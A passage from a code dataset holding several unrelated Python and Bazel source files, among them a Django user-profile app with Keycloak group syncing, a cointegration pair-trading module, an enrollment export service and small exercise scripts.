case_id, format):\n \"\"\"\n Export the enrollments this user is allowed to see, for the given case and format.\n\n Runs in the background, so this returns only the export_id as a reference.\n \"\"\"\n\n # We don't need to store every export ever performed. For now, just store a single export per case/user combo.\n export = db.session.query(BackgroundExport\n ).filter_by(case_id=case_id, user_href=user_href, status=BackgroundExport.STATUS_COMPLETE\n ).first()\n\n export = BackgroundExport(\n params=dict(\n format=format,\n ),\n case_id=case_id,\n user_href=user_href,\n status=BackgroundExport.STATUS_PENDING,\n\n )\n db.session.add(export)\n db.session.commit()\n\n # Queue up the task\n tasks.export_user_case_enrollments.delay(export.id)\n\n return export\n\n def is_export_finished(self, export_id, current_user_href):\n \"\"\"\n Checks to see if an export has finished.\n \"\"\"\n export = self.get_or_404(export_id)\n if export.user_href != current_user_href:\n abort(403)\n\n return export.status == BackgroundExport.STATUS_COMPLETE\n\n def get_export_file(self, export_id, current_user_href):\n \"\"\"\n If an export has finished, retrieve the file for download.\n \"\"\"\n export = self.get_or_404(export_id)\n if export.user_href != current_user_href:\n abort(403)\n\n if export.download_type == BackgroundExport.DOWNLOAD_TYPE_BINARY:\n return export.binary_data\n else:\n return export.unicode_data\n\n\n def process_export(self, export_id):\n export = self.get(export_id)\n\n # Mark as processing\n export.status = BackgroundExport.STATUS_PROCESSING\n db.session.commit()\n\n # Do the export\n case_service = CaseService()\n case = case_service.get(export.case_id)\n\n enrollment_application_service = EnrollmentApplicationService()\n census_records = case_service.get_current_user_census_records(case)\n data = enrollment_application_service.get_enrollment_records_for_census_records(census_records)\n export_data = enrollment_application_service.export_enrollment_data(data)\n\n # Save the results\n export.unicode_data = export_data\n export.download_type = BackgroundExport.DOWNLOAD_TYPE_UNICODE\n 
export.status = BackgroundExport.STATUS_COMPLETE\n        db.session.commit()","sub_path":"taa/services/enrollments/enrollment_export.py","file_name":"enrollment_export.py","file_ext":"py","file_size_in_byte":2953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}{"seq_id":"186775343","text":"from collections import Counter\nclass Solution:\n    def frequencySort(self, s: str) -> str:\n        dct = Counter(s)\n        result = \"\"\n\n        for k, v in sorted(dct.items(), key=lambda s: (s[1], s[0]), reverse=True):\n            result += k * v\n\n        return result\n\ns = Solution()\nprint(s.frequencySort(\"tree\"))","sub_path":"Leetcode/LeetCode Challenges/May LeetCode Challenge/SortCharactersByFrequency.py","file_name":"SortCharactersByFrequency.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}{"seq_id":"422863895","text":"#kuisseuTatchim_edward_final_3.py\r\nimport requests\r\nimport xml.etree.ElementTree\r\nimport time\r\n\r\nf = open(\"kuisseuTatchim_edward_latlon.txt\")\r\nnew = open(\"tatchim_edward_latlon_clean_backup.txt\",\"w\")\r\n\r\nnew_html = open(\"tatchim_edward.html\",\"w\")\r\n\r\nnew_js = open(\"tatchim_edward.js\",\"w\")\r\n\r\nfor i in f.readlines():\r\n\traw = i.split(\":\")\r\n\r\n\tlat_raw = raw[1].split(\",\")\r\n\tlat_pure = lat_raw[0]\r\n\t#print(lat_raw)\r\n\t#print(lat_pure)\r\n\r\n\tlong_raw = raw[2].split(\",\")\r\n\tlong_raw2 = long_raw[0].split(\" \")\r\n\tlong_pure = long_raw2[1]\r\n\r\n\tufo_raw = raw[3].split(\"\\n\")\r\n\tufo_raw2 = ufo_raw[0].split(\" \")\r\n\tufo_pure = ufo_raw2[1]\r\n\tprint(type(ufo_pure))\r\n\r\n\tufo_lines =[lat_pure,long_pure,ufo_pure]\r\n\t#print(ufo_lines)\r\n\t# write() needs a string, not a list, so join the fields first\r\n\tnew.write(\",\".join(ufo_lines) + \"\\n\")\r\n\t#print(lat_pure)\r\n\t#print(long_pure)\r\n\t#print(ufo_pure)\r\n\r\n\r\n\t#for z in raw:\r\n\t#\tpure = z.split(\",\")\r\n\t#\tprint(pure)\r\n\r\n\t#break\r\n\r\nf.close()\r\nnew.close()\r\nnew_html.close()\r\nnew_js.close()","sub_path":"kuisseuTatchim_edward_final_3_try.py","file_name":"kuisseuTatchim_edward_final_3_try.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}{"seq_id":"78449823","text":"def _update_host_personality(module, array, answer=False):\n    'Change host personality. 
Only called when supported'\n personality = array.get_host(module.params['host'], personality=True)['personality']\n if ((personality is None) and (module.params['personality'] != 'delete')):\n try:\n array.set_host(module.params['host'], personality=module.params['personality'])\n answer = True\n except Exception:\n module.fail_json(msg='Personality setting failed.')\n if (personality is not None):\n if (module.params['personality'] == 'delete'):\n try:\n array.set_host(module.params['host'], personality='')\n answer = True\n except Exception:\n module.fail_json(msg='Personality deletion failed.')\n elif (personality != module.params['personality']):\n try:\n array.set_host(module.params['host'], personality=module.params['personality'])\n answer = True\n except Exception:\n module.fail_json(msg='Personality change failed.')\n return answer","sub_path":"Data Set/bug-fixing-5/30c9322e99606bb6eb18e950873139758286c0ef-<_update_host_personality>-fix.py","file_name":"30c9322e99606bb6eb18e950873139758286c0ef-<_update_host_personality>-fix.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"78449823","text":"import time\nfrom enum import Enum, unique\nfrom typing import Dict, Tuple\n# Helping Thom solving branch\nimport numpy as np\nfrom numpy import array\nfrom pandas import DataFrame\nfrom sklearn.linear_model import LinearRegression\nfrom statsmodels.tsa.api import adfuller\n\nfrom src.DataRepository import DataRepository\nfrom src.DataRepository import Universes\nfrom src.Window import Window\nfrom src.util.Features import Features\nfrom src.util.Tickers import Tickers, SnpTickers\n\n\nclass CointegratedPair:\n\n def __init__(self,\n pair: Tuple[Tickers],\n mu_x_ann: float,\n sigma_x_ann: float,\n scaled_beta: float,\n hl: float,\n ou_mean: float,\n ou_std: float,\n ou_diffusion_v: float,\n recent_dev: float,\n recent_dev_scaled: float):\n\n self.pair: Tuple[Tickers] = pair\n self.mu_x_ann: float = mu_x_ann\n self.sigma_x_ann: float = sigma_x_ann\n self.scaled_beta: float = scaled_beta\n self.hl: float = hl\n self.ou_mean = ou_mean\n self.ou_std = ou_std\n self.ou_diffusion_v = ou_diffusion_v\n self.recent_dev: float = recent_dev\n self.recent_dev_scaled: float = recent_dev_scaled\n\n\n@unique\nclass AdfPrecisions(Enum):\n ONE_PCT = r'1%'\n FIVE_PCT = r'5%'\n TEN_PCT = r'10%'\n\n\nclass Cointegrator:\n\n def __init__(self,\n repository: DataRepository,\n adf_confidence_level: AdfPrecisions,\n max_mean_rev_time: int,\n entry_z: float,\n exit_z: float,\n current_window: Window,\n previous_window: Window):\n\n self.repository: DataRepository = repository\n self.adf_confidence_level: AdfPrecisions = adf_confidence_level\n self.max_mean_rev_time: int = max_mean_rev_time\n self.entry_z: float = entry_z\n self.exit_z: float = exit_z\n self.current_window: current_window = current_window\n self.previous_window: Window = previous_window\n\n def generate_pairs(self,\n clustering_results: Dict[int, Tuple[Tuple[Tickers]]],\n hurst_exp_threshold: float):\n # run cointegration_analysis on all poss combinations of pairs\n\n cointegrated_pairs = []\n prev_time = time.time()\n n_tested = 0\n n_cointegrated = 0\n\n x = {0: ((SnpTickers.MSFT, SnpTickers.TAP), (SnpTickers.MSFT, SnpTickers.AAPL)),\n 1: ((SnpTickers.DAL, SnpTickers.AAPL), (SnpTickers.FANG, SnpTickers.APA))}\n\n\n list_of_lists = [i for i in clustering_results.values()]\n\n flattened = [pair for x in list_of_lists for pair in x]\n\n 
sorted_cluster_results = sorted(flattened, key=lambda x: x[0].value)\n\n # sorted_cluster_results = [(SnpTickers.A, SnpTickers.SCHW)]\n\n\n for pair in sorted_cluster_results:\n if n_tested % 100 == 0:\n print(f'Currently checking cointegration for {[i.name for i in pair]}. '\n f'Checked {n_tested}. Number cointegrated {n_cointegrated}. '\n f'Time elapsed (s): {(time.time() - prev_time):.4f}')\n\n t1 = self.current_window.get_data(universe=Universes.SNP,\n tickers=[pair[0]],\n features=[Features.CLOSE])\n t2 = self.current_window.get_data(universe=Universes.SNP,\n tickers=[pair[1]],\n features=[Features.CLOSE])\n\n residuals, beta = self.__logged_lin_reg(t1, t2)\n\n adf_test_statistic, adf_critical_values = self.__adf(residuals)\n hl_test = self.__hl(residuals)\n he_test = self.__hurst_exponent_test(residuals)\n\n is_cointegrated = self.__acceptance_rule(adf_test_statistic, adf_critical_values,\n self.adf_confidence_level, hl_test, self.max_mean_rev_time,\n he_test, hurst_exp_threshold)\n\n if is_cointegrated:\n n_cointegrated += 1\n r_x = self.__log_returner(t1)\n mu_x_ann = float(250 * np.mean(r_x))\n sigma_x_ann = float(250 ** 0.5 * np.std(r_x))\n ou_mean, ou_std, ou_diffusion_v, recent_dev, recent_dev_scaled = self.__ou_params(residuals)\n\n scaled_beta = beta / (beta - 1)\n cointegrated_pairs.append(CointegratedPair(pair, mu_x_ann, sigma_x_ann, scaled_beta, hl_test,\n ou_mean, ou_std, ou_diffusion_v,\n recent_dev, recent_dev_scaled))\n\n print(f\"{[i.name for i in pair]} are cointegrated. \"\n f\"ADF test stat: {adf_test_statistic:.4f} \"\n f\"Critical value @ {adf_critical_values[self.adf_confidence_level.value]:.4f} \"\n f\"Beta: {beta,scaled_beta}\")\n\n if n_cointegrated == 3:\n return cointegrated_pairs\n\n n_tested += 1\n\n return cointegrated_pairs\n\n def __logged_lin_reg(self, x: DataFrame, y: DataFrame) -> Tuple[array, float]:\n\n log_x = x.applymap(lambda k: np.log(k))\n log_y = y.applymap(lambda k: np.log(k))\n\n results = LinearRegression(fit_intercept=False).fit(log_x, log_y)\n residuals = log_y - results.predict(log_x) # e = y - y^\n beta = float(results.coef_[0])\n\n return np.array(residuals), beta\n\n def __log_returner(self, x: DataFrame) -> array:\n x = np.array(x)\n r_x = np.log(x[1:]) - np.log(x[:-1])\n return r_x\n\n def __adf(self, residuals: array):\n '''\n critical values are in the following dictionary form:\n {'1%': -3.4304385694773387,\n '5%': -2.8615791461685034,\n '10%': -2.566790836162312}\n '''\n\n adf_results = adfuller(residuals)\n adf_test_statistic: float = adf_results[0]\n adf_critical_values: Dict[str, float] = adf_results[4]\n\n return adf_test_statistic, adf_critical_values\n\n def __hurst_exponent_test(self, residuals) -> float:\n\n # lag vector\n tau_vector = []\n\n # var[ (1 - L^n)y ]\n variance_delta_vector = []\n\n max_lags = int(self.current_window.window_length.days * 0.5)\n\n for lag in range(2, max_lags):\n # (1 - L^n)y\n delta_res = residuals[lag:] - residuals[:-lag]\n\n tau_vector.append(lag)\n\n variance_delta_vector.append(\n np.var(delta_res)\n )\n\n # avoid 0 values for variance_delta_vector\n variance_delta_vector = [value if value != 0 else 1e-10 for value in variance_delta_vector]\n\n residuals, beta = self.__logged_lin_reg(DataFrame(tau_vector), DataFrame(variance_delta_vector))\n\n # https://quant.stackexchange.com/questions/35513/explanation-of-standard-method-generalized-hurst-exponent\n\n return beta / 2\n\n def __hl(self, residuals: array) -> float:\n\n # independent variable\n lagged_residuals = residuals[:-1]\n # 
dependent variable\n delta_residuals = (residuals[1:] - lagged_residuals)\n model = LinearRegression().fit(lagged_residuals, delta_residuals)\n pi = float(model.coef_[0]) # pi = -k * dt\n # calculate average time of mean reversion from average speed of mean reversion as per formula\n hl_ave_mean_rev_time = np.log(2) / (-pi) # measured in days\n return hl_ave_mean_rev_time\n\n def __ou_params(self, residuals: array) -> Tuple[float, float, float, float, float]:\n # We assume the residuals of a cointegrated pair is an OU process\n\n # independent variable\n lagged_residuals = residuals[:-1]\n # dependent variable\n residuals = residuals[1:]\n model = LinearRegression().fit(lagged_residuals, residuals)\n errors = residuals - model.predict(lagged_residuals)\n ou_mean = float(np.mean(residuals))\n ou_std = float(np.std(residuals))\n sigma_errors = float(np.std(errors))\n ou_diffusion_v = 250 ** 0.5 * sigma_errors\n\n recent_dev = float(residuals[-1])\n recent_dev_scaled = (recent_dev - ou_mean) / ou_std\n\n return ou_mean, ou_std, ou_diffusion_v, recent_dev, recent_dev_scaled\n\n def __acceptance_rule(self, adf_test_statistic: float, adf_critical_values: Dict[str, float],\n adf_confidence_level: AdfPrecisions, hl_test: float, max_mean_rev_time: int, he_test: float,\n hurst_exp_threshold: float):\n\n adf = adf_test_statistic < adf_critical_values[adf_confidence_level.value]\n hl = hl_test < max_mean_rev_time\n he = he_test < hurst_exp_threshold\n\n return all([adf, hl, he])\n","sub_path":"src/Cointegrator.py","file_name":"Cointegrator.py","file_ext":"py","file_size_in_byte":8999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"335423213","text":"from django.conf.urls import url\nfrom . import views\nfrom django.contrib.auth.views import login, logout\nfrom blogapp.views import WritePostView, WriteEmailView\n\napp_name='blogapp'\nurlpatterns = [\n url(r'^$', WriteEmailView.as_view(), name='index'),\n url(r'^(?P[0-9]+)/$', views.detail, name='detail'),\n url(r'^writepost/', WritePostView.as_view(), name='writepost'),\n url(r'^post/new/$', views.post_new, name='post_new'),\n url(r'^login/$', login, {'template_name' : 'blogapp/login.html'}),\n url(r'^logout/$', logout, {'template_name' : 'blogapp/logout.html'}),\n url(r'^register/$', views.register, name='register'),\n url(r'^profile/$', views.profile, name='profile'),\n url(r'^thanks/$', views.thanks, name='thanks'),\n url(r'^wrong-register/$', views.wrong_register, name='wrong_register'),\n url(r'^wrong-post/$', views.wrong_post, name='wrong_post'),\n url(r'^wrong-email/$', views.wrong_email, name='wrong_email'),\n url(r'^VadimPetrov/$', views.vadimpetrov, name='vadimpetrov'),\n url(r'^profile/edit/$', views.profile_edit, name='profile_edit'),\n url(r'^profile/change-password/$', views.change_password, name='change_password'),\n\n]","sub_path":"blogapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"384803469","text":"\"\"\"\nThis is a example on using provider to pass around information between different\nrules. To check the result:\n1. bazel build //main:msg\n2. 
Check the message from output msg.o, and you will see messages\n from three dependencies cat together.\n\n\"\"\"\n\n# Create a msg struct\nmsg = provider(\"message\")\n\ndef _impl(ctx):\n result = \"\"\n\n # Iterate through dependents and cat messages\n for dep in ctx.attr.deps:\n result += dep[msg].message\n ctx.actions.write(output = ctx.outputs.out, content = str(result))\n\n # Return the provider with result, visible to other rules.\n return [msg(message = result)]\n\ndef _dep_impl(ctx):\n # As a dependent, returns a struct with field message set to attr.message\n # If you don't set and return this, will get error mandatory provider\n # not provided\n return [msg(message = ctx.attr.message)]\n\nmsg_rule2 = rule(\n implementation = _dep_impl,\n attrs = {\n \"message\": attr.string(default = \"\"),\n },\n)\n\nmsg_rule = rule(\n implementation = _impl,\n attrs = {\n # \"message\": attr.string(default = \"\"),\n \"deps\": attr.label_list(providers = [msg]),\n },\n outputs = {\"out\": \"%{name}.o\"},\n)\n\n","sub_path":"Bazel_Prep/cpp-tutorial/stage3/main/providers.bzl","file_name":"providers.bzl","file_ext":"bzl","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"418297093","text":"#########################################################################\n#\n# Copyright 2018, GeoSolutions Sas.\n# All rights reserved.\n#\n# This source code is licensed under the BSD-style license found in the\n# LICENSE file in the root directory of this source tree.\n#\n#########################################################################\n\nfrom typing import List\nimport logging\n\nfrom django.conf import settings\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.contrib.auth.mixins import PermissionRequiredMixin\nfrom django.contrib import messages\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom django.core.exceptions import PermissionDenied\nfrom django.shortcuts import redirect\nfrom django.urls import reverse_lazy\nfrom django.urls import reverse\nfrom django.utils import translation\nfrom django.utils.translation import gettext as _\nfrom django.views.generic import CreateView\nfrom django.views.generic import DetailView\nfrom django.views.generic import UpdateView\n\nfrom base import mixins\nfrom base import utils\nfrom keycloakauth import oidchooks\nfrom keycloakauth.keycloakadmin import get_manager as get_keycloak_manager\nfrom . import forms\nfrom . import models\nfrom .rules import has_profile\n\nlogger = logging.getLogger(__name__)\n\n\ndef activate_language(language_code, request):\n logger.debug(\"activate_language called\")\n translation.activate(language_code)\n request.session[translation.LANGUAGE_SESSION_KEY] = language_code\n\n\ndef update_user_groups(user: models.SmbUser, user_profile: str,\n current_keycloak_groups: List[str]):\n \"\"\"Update a user's groups based on the requested user profile\n\n The workflow is:\n\n - user asks Keycloak to become a member of the group(s) corresponding\n to its profile\n - Keycloak either accepts and creates the memberships or denies and\n notifies an admin that user wants to be given membership of said groups\n - if Keycloak created the relevant memberships, we update the user's\n django groups\n\n Note:\n\n We do not use permissions here because we want Keycloak to be the\n authority on the user group memberships. 
In order to do that we can only\n update a django user's django group when we are certain that Keycloak\n already has reflected that membership in its own user database\n\n \"\"\"\n\n keycloak_groups = enforce_keycloak_group_memberships(\n user.keycloak.UID,\n user_profile,\n current_keycloak_groups\n )\n oidchooks.create_django_memberships(user, keycloak_groups)\n\n\ndef enforce_keycloak_group_memberships(user_id: str, user_profile: str,\n current_groups: List[str]):\n \"\"\"Assign user memberships on the relevant KeyCloak groups, if allowed.\n\n The registration of some user profiles, like `end_user`, is automatically\n accepted, resulting in the relevant KeyCloak groups needing to be updated\n with new members. Other profile types are not allowed to self register as\n group members on KeyCloak.\n\n \"\"\"\n\n memberships_to_enforce = settings.KEYCLOAK[\"group_mappings\"][user_profile]\n if set(current_groups) == set(memberships_to_enforce):\n result = current_groups\n else:\n keycloak_manager = get_keycloak_manager(\n base_url=settings.KEYCLOAK[\"base_url\"],\n realm=settings.KEYCLOAK[\"realm\"],\n client_id=settings.KEYCLOAK[\"client_id\"],\n username=settings.KEYCLOAK[\"admin_username\"],\n password=settings.KEYCLOAK[\"admin_password\"],\n )\n if user_profile == settings.END_USER_PROFILE:\n missing_memberships = set(\n memberships_to_enforce) - set(current_groups)\n if any(missing_memberships):\n for group_path in missing_memberships:\n keycloak_manager.add_user_to_group(user_id, group_path)\n result = memberships_to_enforce\n else:\n keycloak_manager.set_user_access(user_id, enabled=False)\n raise RuntimeError(\"profiles of type {!r} must be manually \"\n \"approved by an admin\".format(user_profile))\n return result\n\n\nclass UserProfileMixin(object):\n\n def get_object(self, queryset=None):\n user = self.request.user\n return user.profile if has_profile(user) else False\n\n\nclass PrivilegedUserProfileCreateView(LoginRequiredMixin,\n PermissionRequiredMixin,\n UserProfileMixin,\n mixins.FormUpdatedMessageMixin,\n CreateView):\n model = models.PrivilegedUserProfile\n template_name_suffix = \"_create\"\n success_url = settings.LOGOUT_URL\n permission_required = \"profiles.can_create_profile\"\n fields = ()\n admin_email_subject_template_name = (\n \"profiles/mail/privilegeduser_registration_request_subject.txt\")\n admin_email_message_template_name = (\n \"profiles/mail/privilegeduser_registration_request_message.txt\")\n\n @property\n def success_message(self):\n return _(\"Privileged user profile created!\")\n\n def get_login_url(self):\n if not self.request.user.is_authenticated:\n return settings.LOGIN_URL\n elif has_profile(self.request.user):\n raise PermissionDenied(\"User already has a profile\")\n\n def get_context_data(self, **kwargs):\n context_data = super().get_context_data(**kwargs)\n context_data[\"user_form\"] = self._get_user_form()\n return context_data\n\n def form_valid(self, form):\n \"\"\"Assign the request's user to the form and perform profile moderation\n\n This method relies on the presence of a ``groups`` key on the id token.\n\n \"\"\"\n\n form.instance.user = self.request.user\n user_form = self._get_user_form()\n if user_form.is_valid():\n user = user_form.save()\n activate_language(user.language_preference, self.request)\n super().form_valid(form)\n id_token = self.request.session.get(\"id_token\")\n try:\n update_user_groups(\n user=self.request.user,\n user_profile=settings.PRIVILEGED_USER_PROFILE,\n current_keycloak_groups=id_token.get(\"groups\", 
[])\n )\n result = redirect(\"home\")\n except RuntimeError:\n messages.info(\n self.request, _(\"Registration request sent to admins\"))\n messages.info(self.request, _(\"You have been logged out\"))\n utils.send_email_to_admins(\n self.admin_email_subject_template_name,\n self.admin_email_message_template_name,\n context={\n \"username\": self.request.user.username,\n \"email\": self.request.user.email,\n \"keycloak_base_url\": settings.KEYCLOAK[\"base_url\"],\n \"site_name\": get_current_site(self.request),\n }\n )\n result = redirect(settings.LOGOUT_URL)\n else:\n result = self.form_invalid(form)\n return result\n\n def form_invalid(self, form):\n user_form = self._get_user_form()\n return self.render_to_response(\n self.get_context_data(form=form, user_form=user_form))\n\n def _get_user_form(self):\n data = self.request.POST if self.request.method == \"POST\" else None\n return forms.SmbUserForm(data=data, instance=self.request.user)\n\n\nclass EndUserProfileCreateView(LoginRequiredMixin,\n PermissionRequiredMixin,\n UserProfileMixin,\n mixins.FormUpdatedMessageMixin,\n CreateView):\n \"\"\"Profile completion view\n\n This view uses two forms, one for the completion of the user profile and\n another for the mobility habits survey.\n\n \"\"\"\n\n model = models.EndUserProfile\n form_class = forms.EndUserProfileForm\n template_name_suffix = \"_create\"\n permission_required = \"profiles.can_create_profile\"\n success_url = reverse_lazy(\"profile:update\")\n\n @property\n def success_message(self):\n return _(\"User profile created. You can now add some bikes\")\n\n def get_login_url(self):\n if not self.request.user.is_authenticated:\n return settings.LOGIN_URL\n elif has_profile(self.request.user):\n raise PermissionDenied(\"User already has a profile\")\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context.update(self._get_extra_forms())\n return context\n\n def form_valid(self, form):\n \"\"\"Assign the request's user to the form and perform profile moderation\n\n This method relies on the presence of a ``groups`` key on the id token.\n This key is used in order to sync group memberships with keycloak.\n\n \"\"\"\n\n form.instance.user = self.request.user\n # validate extra forms before saving anything\n extra_forms = self._get_extra_forms()\n if all([f.is_valid() for f in extra_forms.values()]):\n super().form_valid(form)\n # upon calling super().form_valid(form) the property self.object\n # points to the newly created enduser profile\n mobility_form = extra_forms[\"mobility_form\"]\n mobility_form.instance.end_user = self.object\n mobility_form.save()\n user_form = extra_forms[\"user_form\"]\n user = user_form.save()\n activate_language(user.language_preference, self.request)\n response = redirect(self.get_success_url())\n id_token = self.request.session.get(\"id_token\")\n update_user_groups(\n user=self.request.user,\n user_profile=settings.END_USER_PROFILE,\n current_keycloak_groups=id_token.get(\"groups\", [])\n )\n else:\n response = self.form_invalid(form)\n logger.debug(\"response: {}\".format(response))\n return response\n\n def form_invalid(self, form):\n extra_forms = self._get_extra_forms()\n return self.render_to_response(\n self.get_context_data(form=form, **extra_forms))\n\n def _get_extra_forms(self):\n data = self.request.POST if self.request.method == \"POST\" else None\n return {\n \"user_form\": forms.SmbUserForm(data=data,\n instance=self.request.user),\n \"mobility_form\": forms.UserMobilityHabitsForm(data=data)\n 
}\n\n\nclass ProfileUpdateView(LoginRequiredMixin,\n PermissionRequiredMixin,\n mixins.UserHasObjectPermissionMixin,\n UserProfileMixin,\n mixins.FormUpdatedMessageMixin,\n UpdateView):\n permission_required = \"profiles.can_edit_profile\"\n\n @property\n def success_message(self):\n return _(\"User profile updated!\")\n\n def has_permission(self):\n user = self.request.user\n for perm in self.get_permission_required():\n if not user.has_perm(perm, obj=user.profile):\n result = False\n break\n else:\n result = True\n return result\n\n def get_template_names(self):\n profile_class = type(self.request.user.profile)\n template_name = {\n models.EndUserProfile: \"profiles/enduserprofile_update.html\",\n models.PrivilegedUserProfile: (\n \"profiles/privilegeduserprofile_update.html\"),\n }.get(profile_class)\n return [template_name]\n\n def get_queryset(self):\n profile_class = type(self.request.user.profile)\n return profile_class.objects.get(pk=self.request.user.profile.pk)\n\n def get_form_class(self):\n profile_class = type(self.request.user.profile)\n return {\n models.EndUserProfile: forms.EndUserProfileForm,\n models.PrivilegedUserProfile: forms.PrivilegedUserProfileForm,\n }.get(profile_class)\n\n def get_context_data(self, **kwargs):\n context_data = super().get_context_data(**kwargs)\n context_data[\"user_form\"] = self._get_user_form()\n return context_data\n\n def get_login_url(self):\n if not self.request.user.is_authenticated:\n result = settings.LOGIN_URL\n else:\n messages.info(\n self.request,\n _(\"Please complete your user profile before continuing\")\n )\n result = reverse(\"profile:create\")\n return result\n\n def form_valid(self, form):\n \"\"\"Process uploaded form data after the form has been validated\n\n Reimplemented in order to also perform validation on the other form,\n for the SmbUser model, and handle all uploaded data.\n\n \"\"\"\n\n form.instance.user = self.request.user\n user_form = self._get_user_form()\n if user_form.is_valid():\n user = user_form.save()\n activate_language(user.language_preference, self.request)\n response = super().form_valid(form)\n else:\n response = self.form_invalid(form)\n return response\n\n def form_invalid(self, form):\n user_form = self._get_user_form()\n return self.render_to_response(\n self.get_context_data(form=form, user_form=user_form))\n\n def _get_user_form(self):\n data = self.request.POST if self.request.method == \"POST\" else None\n return forms.SmbUserForm(data=data, instance=self.request.user)\n\n\nclass MobilityHabitsSurveyCreateView(LoginRequiredMixin,\n PermissionRequiredMixin,\n UserProfileMixin,\n mixins.FormUpdatedMessageMixin,\n CreateView):\n model = models.MobilityHabitsSurvey\n context_object_name = \"survey\"\n form_class = forms.UserMobilityHabitsForm\n template_name_suffix = \"_create\"\n success_url = reverse_lazy(\"profile:update\")\n permission_required = \"profiles.can_edit_profile\"\n\n def has_permission(self):\n user = self.request.user\n for perm in self.get_permission_required():\n if not user.has_perm(perm, obj=user.profile):\n result = False\n break\n else:\n result = True\n return result\n\n def get_login_url(self):\n if not self.request.user.is_authenticated:\n return settings.LOGIN_URL\n else:\n raise PermissionDenied()\n\n def form_valid(self, form):\n form.instance.end_user = self.request.user.profile\n return super().form_valid(form)\n\n\nclass MobilityHabitsSurveyDetailView(LoginRequiredMixin,\n PermissionRequiredMixin,\n mixins.AjaxTemplateMixin,\n DetailView):\n model = 
models.MobilityHabitsSurvey\n    context_object_name = \"survey\"\n    permission_required = \"profiles.can_view_profile\"\n    ajax_template_name = \"profiles/mobilityhabitssurvey_detail_inner.html\"\n","sub_path":"smbportal/profiles/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":15332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}{"seq_id":"23483333","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Create a test_counters_input module that runs code very similar to that of test_counters_exceptions,\nbut accepts the three values as input from the command line instead of generating them automatically\n(see the online documentation of the argparse library).\n->'-i' gives the initial value of the counter,\n-> '-a' the number of counter increments to perform,\n->'-d' the number of decrements to perform.\"\"\"\n\n# import the library for parsing the script's parameters\nimport argparse\n\nfrom test_counters_exceptions import test_counters_exceptions\n\n\ndef get_parser():\n    \"\"\"\n    Create and return a parser that accepts the three mandatory parameters\n    -i, -a and -d\n    \"\"\"\n    p = argparse.ArgumentParser(\n        description=\"Counter test with exception handling\")\n    p.add_argument('-i', dest='inizio', type=int, required=True,\n                   help='Initial value of the counter')\n    p.add_argument('-a', dest='inc', type=int, required=True,\n                   help='Number of increments')\n    p.add_argument('-d', dest='dec', type=int, required=True,\n                   help='Number of decrements')\n    return p\n\nif __name__ == \"__main__\":\n    parser = get_parser()\n    args = parser.parse_args()\n\n    # to try with a known series of parameters, e.g. from ipython\n    # args = parser.parse_args('-i 3 -a 4 -d 5'.split())\n    lista = []\n\n    lista.append(args.inizio)\n    lista.append(args.inc)\n    lista.append(args.dec)\n    s = \"Script invoked with parameters:\\n\\t Initial value: {}\\n\\t \"\n    s += \"Number of increments: {}\\n\\t Number of decrements: {}\"\n\n    print(s.format(lista[0], lista[1], lista[2]))\n\n    test_counters_exceptions(lista)","sub_path":"Phyton01/test_counters_input.py","file_name":"test_counters_input.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}{"seq_id":"48694035","text":"from PyQt5 import QtWidgets\nfrom PyQt5.QtWidgets import QApplication, QMainWindow\nimport sys\n\nclass MyWindow(QMainWindow):\n\tdef __init__(self):\n\t\tsuper(MyWindow, self).__init__()\n\t\tself.setGeometry(200, 200, 300, 300)\n\t\tself.setWindowTitle(\"Zeus\")\n\t\tself.initUI()\n\t\n\tdef initUI(self):\n\t\tself.label = QtWidgets.QLabel(self)\n\t\tself.label.setText(\"Test Label\")\n\t\tself.label.move(50,50)\n\n\t\tself.b1 = QtWidgets.QPushButton(self)\n\t\tself.b1.setText(\"Click Me\")\n\t\tself.b1.clicked.connect(self.b1_clicked)\n\n\tdef b1_clicked(self):\n\t\tself.label.setText(\"pressed\")\n\t\tself.update()\n\n\tdef update(self):\n\t\tself.label.setStyleSheet(\"border: 1px solid black;\")\n\t\tself.label.adjustSize()\n\ndef window():\n\tapp = QApplication(sys.argv)\n\twin = MyWindow()\n\twin.show()\n\tsys.exit(app.exec_())\n\nwindow()","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}{"seq_id":"645707709","text":"from django.shortcuts import render, redirect\nfrom .models import Todo\nfrom django.views.decorators.http import require_POST\nfrom .forms import 
